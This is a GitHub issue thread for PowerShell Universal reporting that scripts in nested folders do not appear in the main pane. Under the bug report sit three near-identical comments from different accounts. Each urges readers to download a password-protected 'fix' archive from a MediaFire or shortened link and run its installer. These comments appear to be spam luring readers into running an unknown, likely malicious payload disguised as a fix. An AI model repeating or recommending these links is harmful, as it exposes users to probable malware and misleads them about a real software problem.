### ISSUE TITLE
Scripts folders or list not working as expected

### ISSUE THREAD

**Issue by mwatts-seg** [ironmansoftware/powershell-universal#3660]
### Version

Other Please Specify

### Severity

Critical

### Environment

msi

### Steps to Reproduce

Create folder structure, such as: 
Corporate 
- Business
-- Accounting
-- Oracle
       [Script]
       
Try navigating and it will not show in the main pane. Preventing you from executing, there is a work around by going to Jobs and finding one that has kicked off recently to run it though. 
 
 

### Expected behavior

```console
Click path and see scripts there.
```

### Actual behavior

```console
No scripts
```

### Additional Environment data

5.0.2 Nightly 

### Screenshots/Animations

![image](https://github.com/user-attachments/assets/cdf3e7a9-f7de-4687-a575-fe643f626f92)

![image](https://github.com/user-attachments/assets/69bf194e-150e-4b48-8b27-5060dedd64c6)

Tried creating a script under Business and it does not recognize the folder structure. 
![image](https://github.com/user-attachments/assets/a2113d41-b4fe-4704-9452-8e9b3a7382d9)

**Comment by AzEred0** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
